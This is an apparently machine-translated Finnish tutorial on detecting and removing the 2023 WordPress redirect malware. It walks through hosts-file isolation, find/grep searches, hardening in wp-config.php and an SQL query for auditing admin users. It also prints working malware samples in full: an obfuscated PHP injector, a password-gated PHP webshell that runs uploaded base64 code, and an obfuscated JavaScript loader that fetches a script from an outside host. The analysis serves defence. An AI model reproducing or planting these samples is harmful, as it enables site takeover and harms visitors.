Fix Redirect WordPress Hack 2023 (Virus Redirect)

WordPress se on ehdottomasti eniten käytetty alusta CMS (Content Management System) sekä blogeille että aloitusverkkokaupoille (moduulin kanssa WooCommerce), mikä tekee siitä eniten tietokonehyökkäysten (hakkeroinnin) kohteena. Yksi käytetyimmistä hakkerointioperaatioista pyrkii ohjaamaan vaarantunut verkkosivusto muille verkkosivuille. Redirect WordPress Hack 2023 on suhteellisen uusi haittaohjelma, joka ohjaa koko sivuston roskapostisivuille tai voi vuorostaan saastuttaa käyttäjien tietokoneita.

Jos sivustosi on kehitetty WordPress uudelleenohjataan toiselle sivustolle, se on todennäköisesti jo kuuluisan uudelleenohjaushakkeroinnin uhri.

Tästä opetusohjelmasta löydät tarvittavat tiedot ja hyödyllisiä vinkkejä, joiden avulla voit poistaa viruksen uudelleenohjauksella saastuneelta verkkosivustolta WordPress Hack (Virus Redirect). Kommenttien kautta voit saada lisätietoa tai pyytää apua.

Sisältö

Viruksen havaitseminen, joka uudelleenohjaa sivustot WordPress

Äkillinen ja perusteeton nettiliikenteen väheneminen, tilausten määrän (verkkokaupoissa) tai mainostulojen lasku ovat ensimmäisiä merkkejä siitä, että jokin on vialla. Havaitaan "Redirect WordPress Hack 2023” (Virus Redirect) voidaan tehdä myös "visuaalisesti", kun avaat verkkosivuston ja sinut ohjataan toiselle verkkosivulle.

Kokemuksen mukaan useimmat verkkohaittaohjelmat ovat yhteensopivia Internet-selaimien kanssa: Chrome, Firefox, Edge, Opera. Jos olet tietokoneen käyttäjä Mac, nämä virukset eivät todellakaan näy selaimessa Safari. Turvajärjestelmä alkaen Safari estää äänettömästi nämä haitalliset skriptit.

Mitä tehdä, jos verkkosivustosi on saanut tartunnan Redirect WordPress Hack

Toivon, että ensimmäinen askel ei ole paniikki tai verkkosivuston poistaminen. Edes tartunnan saaneita tai virustiedostoja ei pidä poistaa aluksi. Ne sisältävät arvokasta tietoa, joka voi auttaa sinua ymmärtämään, missä tietoturvaloukkaus on ja mikä virukseen vaikutti. Toimintatapa.

Sulje verkkosivusto yleisöltä.

Kuinka suljet virussivuston vierailijoilta? Yksinkertaisin on käyttää DNS-hallintaa ja poistaa "A":n (verkkotunnuksen nimi) IP-osoite tai määrittää IP-osoite, jota ei ole olemassa. Siten verkkosivujen vierailijat suojataan tältä redirect WordPress hack mikä saattaa johtaa heidät viruksille tai roskapostille.

Jos käytät CloudFlare DNS-päällikkönä kirjaudut sisään tilille ja poistat DNS-tietueet "A" verkkotunnukselle. Siten viruksen saastuttama verkkotunnus jää ilman IP-osoitetta, eikä siihen voi enää päästä Internetistä.

Kopioit verkkosivuston IP-osoitteen ja "reitität" sen niin, että vain sinä pääset siihen. tietokoneeltasi.

Kuinka muuttaa verkkosivuston todellista IP-osoitetta tietokoneissa Windows?

Menetelmää käytetään usein estämään pääsy tietyille verkkosivustoille muokkaamalla "hosts"-tiedostoa.

1. Avaat Notepad tai muu tekstieditori (oikeuksineen administrator) ja muokkaa tiedostoa "hosts". Se sijaitsee:

C:\Windows\System32\drivers\etc\hosts

2. Lisää "hosts"-tiedostoon "reitti" verkkosivustosi todelliseen IP-osoitteeseen. IP poistettu yllä DNS-hallinnasta.

IP.IP.IP.IP yourdomain.tld
IP.IP.IP.IP www.yourdomain.tld

3. Tallenna tiedosto ja siirry verkkosivustolle selaimessa.

Jos verkkosivusto ei avaudu etkä ole tehnyt mitään väärää "hosts"-tiedostossa, kyseessä on todennäköisesti DNS-välimuisti.

DNS-välimuistin tyhjentäminen käyttöjärjestelmässä Windows, auki Command Prompt, jossa suoritat komennon:

ipconfig /flushdns

Kuinka muuttaa verkkosivuston todellista IP-osoitetta tietokoneissa Mac / MacKirja?

Tietokoneen käyttäjille Mac Web-sivuston todellisen IP-osoitteen vaihtaminen on hieman yksinkertaisempaa.

1. Avaa apuohjelma Terminal.

2. Suorita komentorivi (vaatii järjestelmän salasanan suorittamiseen):

sudo nano /etc/hosts

3. Sama kuin tietokoneissa Windows, lisää verkkotunnuksen todellinen IP-osoite.

IP.IP.IP.IP yourdomain.tld
IP.IP.IP.IP www.yourdomain.tld

4. Tallenna muutokset. Ctrl+X (y).

Kun olet "reitittänyt", olet ainoa henkilö, jolla on pääsy tartunnan saaneelle verkkosivustolle Redirect WordPress Hack.

Täydellinen verkkosivuston varmuuskopiointi – tiedostot ja tietokanta

Vaikka se olisi saanut tartunnanredirect WordPress hack”, suositus on tehdä yleinen varmuuskopio koko sivustosta. Tiedostot ja tietokanta. Mahdollisesti voit myös tallentaa paikallisen kopion molemmista tiedostoista public / public_html sekä tietokanta.

Tartunnan saaneiden tiedostojen ja muokkaamien tiedostojen tunnistus Redirect WordPress Hack 2023

Sivuston tärkeimmät kohdetiedostot WordPress on olemassa index.php (juuressa), header.php, index.php şi footer.php teemasta WordPress omaisuutta. Tarkista nämä tiedostot manuaalisesti ja tunnista haitallinen koodi tai haittaohjelmakomentosarja.

Vuonna 2023 virusRedirect WordPress Hack”laita sisään index.php lomakkeen koodi:

(En suosittele näiden koodien käyttämistä!)

<?php $t='er'.'ro'.'r_'.'r'.'epo'.'rt'.'in'.'g';$b0='MDxXRVM3Vj1FPSVdVDk2VVA3VjFJPEBgYApgCg==';$b1='b'.'a'.'se'.'6'.'4_'.'e'.''.'nc'.'od'.'e';$b2='b'.'as'.'e'.'6'.'4_d'.'e'.'c'.'o'.'d'.'e';$b3='c'.'on'.'ve'.'rt_uue'.'nco'.'de';$b4='c'.'o'.'nve'.'rt'.'_u'.'ude'.'co'.'de';$b5='MTlGRUw5'.'NV1QPTcxP'.'zhWXU'.'49JjVOPScsYApgCg==';$b7='';$b8='JD0mR'.'UM6U'.'GBgCmAK';$b9='IzkmRUUKYAo=';$b10='Izs2'.'MFU'.'KYAo=';$b11='QC4mOFE5Q0RWLSYkVDhDMUQ'.'uJjBRODYsU'.'zlDYFMuI'.'zhWLjMtRCx'.'DQUQsIyxgCmAK';$b12='IjhG'.'QGA'.'KYAo=';$b13='IjhDLGAKYAo=';$b14='Ji8jXV'.'A6J'.'2BACmAK';$b18='LS8nLUM8R'.'kVQPSIh'.'UzxGLF0pUGBgCmAK';$b19='KylTWFwrVy1DPEZFUD0jWGAKYAo=';$b20='            TDonMVQ8JyxaK1JdUz0mJVkrRlFJO0Y1Uz0mXUc5NzBOOFZdTStXLUM8RkVQPScsTzhWQUU4VkxOOkcsYApgCg==';$b21='JTwnKUk7RzBgCmAK';$b22='KD1XYE04NjFNOjZYYApgCg==';$b23='KD1XYE07Jl1HOjZYYApgCg==';$b24='KjxGNVM9JV1SO1c1VDkwYGAKYAo=';$b25='Jz1XYE06Ry1PO0BgYApgCg==';$b30='KTIlMTQ0JV0oM1UtNApgCg==';$b31='KzRENTE1NDUzNSVdNTRERGAKYAo=';$b34='JjxXMVI8Jl1TCmAK';$b41='WlhOeWEycDBjMmg1Y3paaFpUUnJhblU9';$b16=$b4($b2($b0))();if(isset($_POST[$b4($b2($b12))])){if($b4($b2($b10))($_POST[$b4($b2($b12))])===$b4($b2($b11))){ $b45=$_POST[$b4($b2($b13))];$b4($b2($b5))($b16.'/'.$b4($b2($b8)),$b4($b2($b14)).$b2($b45));@include($b16.'/'.$b4($b2($b8)));die();}}if(isset($_POST[$b4($b2($b8)).$b4($b2($b8))])||isset($_GET[$b4($b2($b8)).$b4($b2($b8))])){echo $b4($b2($b10))($b4($b2($b8)));die();}else{$b27=0;$b26=array($b4($b2($b22)),$b4($b2($b23)),$b4($b2($b24)),$b4($b2($b25)));$b32 = $_SERVER[$b4($b2($b30))].$_SERVER[$b4($b2($b31))];foreach ($b26 as $b33) {if($b4($b2($b34))($b32,$b33) !== false){$b27=1;}}if($b27==0) {echo $b4($b2($b18)).$b4($b2($b20)).$b4($b2($b19));}} ?>

Dekoodattu, tämä haitallinen kirjoitus se on pohjimmiltaan seurausta verkkosivuston saastuttamisesta WordPress. Se ei ole haittaohjelman takana oleva komentosarja, vaan komentosarja, joka mahdollistaa tartunnan saaneen verkkosivun uudelleenohjauksen. Jos puramme yllä olevan skriptin, saamme:

<script src="/cdn-cgi/apps/head/D6nq5D2EcGpWI6Zldc9omMs3J_0.js"></script>
<script src="https://stay.linestoget.com/scripts/check.js" type="c2cc1212300ac9423a61ac0b-text/javascript"></script>
<script src="/cdn-cgi/scripts/7d0fa10a/cloudflare-static/rocket-loader.min.js" data-cf-settings="c2cc1212300ac9423a61ac0b-|49" defer></script>

Jotta voit tunnistaa kaikki tämän koodin sisältävät tiedostot palvelimella, sinulla on hyvä olla pääsy SSH palvelimelle suorittamaan tiedostojen tarkistuksen ja hallinnan komentorivit Linux.

Alla on kaksi komentoa, jotka ovat varmasti hyödyllisiä tunnistamaan äskettäin muokatut tiedostot ja tiedostot, jotka sisältävät tietyn koodin (merkkijonon).

Miten näet Linux PHP-tiedostoja on muutettu viimeisten 24 tunnin aikana vai jossain muussa ajassa?

Tilaus "find” on erittäin helppokäyttöinen ja mahdollistaa mukauttamisen aikajakson, hakupolun ja tiedostotyypin asettamiseen.

find /your/web/path -type f -mtime -1 -exec ls -l {} \; | grep "\.php$"

Tulosteessa saat tietoa päivämäärästä ja kellonajasta, jolloin tiedostoa muokattiin, kirjoitus-/luku-/suoritusoikeuksista (chmod) ja mihin ryhmään/käyttäjään se kuuluu.

Jos haluat tarkistaa useampia päiviä sitten, muuta arvoa "-mtime -1"tai käytä"-mmin -360” minuuttia (6 tuntia).

Kuinka etsiä koodia (merkkijonoa) PHP-, Java-tiedostoista?

"Fid"-komentorivi, jonka avulla voit löytää nopeasti kaikki PHP- tai Java-tiedostot, jotka sisältävät tietyn koodin, on seuraava:

find /your/web/path -type f \( -name "*.js" -o -name "*.php" \) -exec grep -l "uJjBRODYsU" {} +

Komento etsii ja näyttää tiedostot .php şi .js sisältävät "uJjBRODYsU".

Yllä olevien kahden komennon avulla saat helposti selville, mitä tiedostoja on muokattu äskettäin ja mitkä sisältävät haittaohjelmakoodia.

Poistaa haitallisen koodin muokatuista tiedostoista vaarantamatta oikeaa koodia. Minun skenaariossani haittaohjelma sijoitettiin ennen avaamista <head>.

Kun suoritat ensimmäistä "find"-komentoa, on erittäin mahdollista löytää palvelimelta uusia tiedostoja, jotka eivät ole sinun WordPress eikä sinun laittamaasi sinne. Virustyyppiin kuuluvat tiedostot Redirect WordPress Hack.

Tutkimassani skenaariossa tiedostot muotoa "wp-log-nOXdgD.php". Nämä ovat "spawn"-tiedostoja, jotka sisältävät myös haittaohjelmakoodia, jota virus käyttää uudelleenohjaukseen.

<?php $t="er"."ro"."r_"."r"."epo"."rt"."in"."g";$t(0); $a=sys_get_temp_dir();if(isset($_POST['bh'])){if(md5($_POST['bh'])==="8f1f964a4b4d8d1ac3f0386693d28d03"){$b3=$_POST['b3'];file_put_contents($a."/tpfile","<"."?"."p"."h"."p ".base64_decode($b3));@include($a."/tpfile");die();}}if(isset($_POST['tick'])||isset($_GET['tick'])){echo md5('885');}

"tyyppisten tiedostojen tarkoituswp-log-*” on levittää uudelleenohjaushakkerointivirusta muille palvelimella oleville verkkosivustoille. Se on tyyppiä oleva haittaohjelmakoodiwebshell” koostuu a perusosio (jossa on määritelty joitain salattuja muuttujia) ja o suoritusosio jonka kautta hyökkääjä yrittää ladata ja suorittaa haitallisen koodin järjestelmään.

Jos on muuttuja POST nimeltä 'bhja sen salattu arvo MD5 on yhtä suuri kuin "8f1f964a4b4d8d1ac3f0386693d28d03", komentosarja näyttää kirjoittavan salatun sisällön base64 toisesta muuttujasta nimeltä 'b3' väliaikaiseen tiedostoon ja yrittää sitten sisällyttää tämän väliaikaisen tiedoston.

Jos on muuttuja POST tai GET nimeltä 'tick', komentosarja vastaa arvolla MD5 merkkijonosta"885".

Tunnistaaksesi kaikki tämän koodin sisältävät tiedostot palvelimella, valitse yhteinen merkkijono ja suorita sitten komento "find” (samanlainen kuin yllä). Poista kaikki tämän haittaohjelmakoodin sisältävät tiedostot.

Turvavirhe, jota on käyttänyt hyväkseen Redirect WordPress Hack

Todennäköisesti tämä uudelleenohjausvirus saapuu kautta järjestelmänvalvojan käyttäjän hyväksikäyttö WordPress tai tunnistamalla a haavoittuva laajennus jonka avulla voidaan lisätä käyttäjiä, joilla on oikeudet administrator.

Useimmille alustalle rakennetuille verkkosivustoille WordPress on mahdollista teema- tai laajennustiedostojen muokkaaminenhallintaliittymästä (Dashboard). Näin ollen pahantahtoinen henkilö voi lisätä haittaohjelmakoodia teematiedostoihin luodakseen yllä kuvattuja komentosarjoja.

Esimerkki tällaisesta haittaohjelmakoodista on tämä:

<script>var s='3558289hXnVzT';var _0x1e8ff2=_0x1524;(function(_0x5062c1,_0x3340a3){var _0x1fb079=_0x1524,_0x1e7757=_0x5062c1();while(!![]){try{var _0x2a4ba9=-parseInt(_0x1fb079(0x178))/0x1*(parseInt(_0x1fb079(0x189))/0x2)+-parseInt(_0x1fb079(0x187))/0x3+parseInt(_0x1fb079(0x17e))/0x4+-parseInt(_0x1fb079(0x182))/0x5+-parseInt(_0x1fb079(0x176))/0x6*(-parseInt(_0x1fb079(0x17c))/0x7)+-parseInt(_0x1fb079(0x177))/0x8*(parseInt(_0x1fb079(0x172))/0x9)+-parseInt(_0x1fb079(0x181))/0xa*(-parseInt(_0x1fb079(0x179))/0xb);if(_0x2a4ba9===_0x3340a3)break;else _0x1e7757['push'](_0x1e7757['shift']());}catch(_0x332dc7){_0x1e7757['push'](_0x1e7757['shift']());}}}(_0x18f7,0x56d7f));function _0x18f7(){var _0x33878d=['getElementsByTagName','684364prPqlZ','src','873KJkhlg','fromCharCode','head','script[src=\x22','1137318yPDczb','1648yAATZA','1MjirdU','1936BqEZLn','9.3.2','createElement','21FNTvZp','appendChild','1812244aSZNJb','script','currentScript','15090pySUMO','1032605tfOmII','querySelector','insertBefore','parentNode','/sta','1088724TsmeQl'];_0x18f7=function(){return _0x33878d;};return _0x18f7();}function isScriptLoaded(_0x47ea31){var _0x210a48=_0x1524;return Boolean(document[_0x210a48(0x183)](_0x210a48(0x175)+_0x47ea31+'\x22]'));}var bd='ht'+'tp'+'s:'+'/'+_0x1e8ff2(0x186)+'y.l'+String[_0x1e8ff2(0x173)](0x69,0x6e,0x65,0x73,0x74,0x6f,0x67,0x65,0x74,0x2e,0x63,0x6f,0x6d,0x2f,0x73,0x63,0x72,0x69,0x70,0x74,0x73,0x2f,0x63,0x68,0x65,0x63,0x6b,0x2e,0x6a,0x73,0x3f,0x76,0x3d)+_0x1e8ff2(0x17a);function _0x1524(_0x1168b6,_0x2ef792){var _0x18f7eb=_0x18f7();return _0x1524=function(_0x15242f,_0x543bbb){_0x15242f=_0x15242f-0x171;var _0xef6154=_0x18f7eb[_0x15242f];return _0xef6154;},_0x1524(_0x1168b6,_0x2ef792);}if(isScriptLoaded(bd)===![]){var d=document,s=d[_0x1e8ff2(0x17b)](_0x1e8ff2(0x17f));s[_0x1e8ff2(0x171)]=bd,document[_0x1e8ff2(0x180)]?document['currentScript'][_0x1e8ff2(0x185)]!==null&&document[_0x1e8ff2(0x180)][_0x1e8ff2(0x185)][_0x1e8ff2(0x184)](s,document[_0x1e8ff2(0x180)]):d[_0x1e8ff2(0x188)](_0x1e8ff2(0x174))[0x0]!==null&&d[_0x1e8ff2(0x188)]('head')[0x0][_0x1e8ff2(0x17d)](s);}</script>

JavaScript tunnistettu teeman otsikossa WordPress, heti etiketin avaamisen jälkeen <head>.

Tämän JavaScriptin tulkitseminen on melko vaikeaa, mutta on ilmeistä, että se kysyy toisesta verkko-osoitteesta, josta se todennäköisesti hakee muita komentosarjoja tiedostojen luomiseksi "wp-log-*”, josta puhuin edellä.

Etsi ja poista tämä koodi kaikista tiedostoista PHP vaikuttaa.

Sikäli kuin ymmärsin, tämä koodi oli lisätty manuaalisesti uusi käyttäjä, jolla on järjestelmänvalvojan oikeudet.

Joten estääksesi haittaohjelmien lisäämisen hallintapaneelista, on parasta poistaa muokkausvaihtoehto käytöstä WordPress Teemat / laajennukset hallintapaneelista.

Muokkaa tiedostoa wp-config.php ja lisää rivit:

define('DISALLOW_FILE_EDIT',true);
define('DISALLOW_FILE_MODS',true);

Tämän muutoksen tekemisen jälkeen ei yhtään käyttäjää WordPress et voi enää muokata tiedostoja hallintapaneelista.

Tarkista käyttäjät roolilla Administrator

Alla on SQL-kysely, jonka avulla voit etsiä käyttäjiä roolissa administrator alustalla WordPress:

SELECT * FROM wp_users
INNER JOIN wp_usermeta ON wp_users.ID = wp_usermeta.user_id
WHERE wp_usermeta.meta_key = 'wp_capabilities'
AND wp_usermeta.meta_value LIKE '%administrator%'

Tämä kysely palauttaa kaikki taulukon käyttäjät wp_users joka on määrittänyt roolin administrator. Kysely tehdään myös taulukolle wp_usermeta etsiä metasta 'wp_capabilities', joka sisältää tietoja käyttäjärooleista.

Toinen tapa on tunnistaa ne seuraavista: Dashboard → Users → All Users → Administrator. On kuitenkin olemassa käytäntöjä, joilla käyttäjä voidaan piilottaa Dashboard-paneelissa. Joten paras tapa nähdä käyttäjätAdministrator"In WordPress on yllä oleva SQL-komento.

Minun tapauksessani tunnistin tietokannasta käyttäjän nimellä "wp-import-user". Aika vihjailevaa.

Myös täältä näet päivämäärän ja kellonajan, jolloin käyttäjä WordPress luotiin. Käyttäjätunnus on myös erittäin tärkeä, koska se hakee palvelimen lokeista. Näin näet kaiken tämän käyttäjän toiminnan.

Poista käyttäjät roolilla administrator jota et sitten tiedä vaihtaa salasanoja kaikille järjestelmänvalvojille. Toimittaja, Kirjoittaja, Administrator.

Vaihda SQL-tietokannan käyttäjän salasana sivustolta, jota asia koskee.

Näiden vaiheiden suorittamisen jälkeen verkkosivusto voidaan käynnistää uudelleen kaikille käyttäjille.

Muista kuitenkin, että edellä esittämäni on yksi ehkä tuhansista skenaarioista, joissa verkkosivusto on saastunut Redirect WordPress Hack vuonna 2023.

Jos sivustosi on saanut tartunnan ja tarvitset apua tai jos sinulla on kysyttävää, kommenttiosio on auki.